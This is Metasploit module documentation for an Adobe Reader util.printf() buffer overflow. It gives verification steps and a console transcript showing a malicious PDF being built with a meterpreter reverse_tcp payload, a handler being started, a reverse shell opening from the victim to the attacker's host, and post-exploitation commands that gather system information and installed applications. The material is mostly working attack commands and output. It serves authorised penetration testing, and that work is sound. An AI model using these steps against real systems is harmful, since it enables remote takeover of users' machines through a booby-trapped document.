metasploit-framework/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md

2.6 KiB

Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.

Link to vulnerable software OldVersion

Verification Steps

  1. Install application on the target machine
  2. Start msfconsole
  3. Do: use exploit/windows/fileformat/adobe_utilprintf
  4. Do: set payload [windows/meterpreter/reverse_tcp]
  5. Do: set LHOST [IP]
  6. Do: exploit
  7. Do: use exploit/multi/handler
  8. Do: set LHOST [IP]
  9. Do: exploit
  10. Do: Open PDF on target machine with vulnerable software

Scenarios

Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
  FILENAME => utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > exploit

  [*] Creating 'utilprintf.pdf' file...
  [+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] Sending stage (180291 bytes) to 192.168.1.5
  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700

meterpreter > sysinfo
  Computer        : COMPUTER_1
  OS              : Windows XP (5.1 Build 2600, Service Pack 3).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter > getuid
  Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

  [*] Enumerating applications installed on COMPUTER_1

  Installed Applications
  ======================

  Name            Version
  ----            -------
  Adobe Reader 8  8.0.0


  [+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
  ```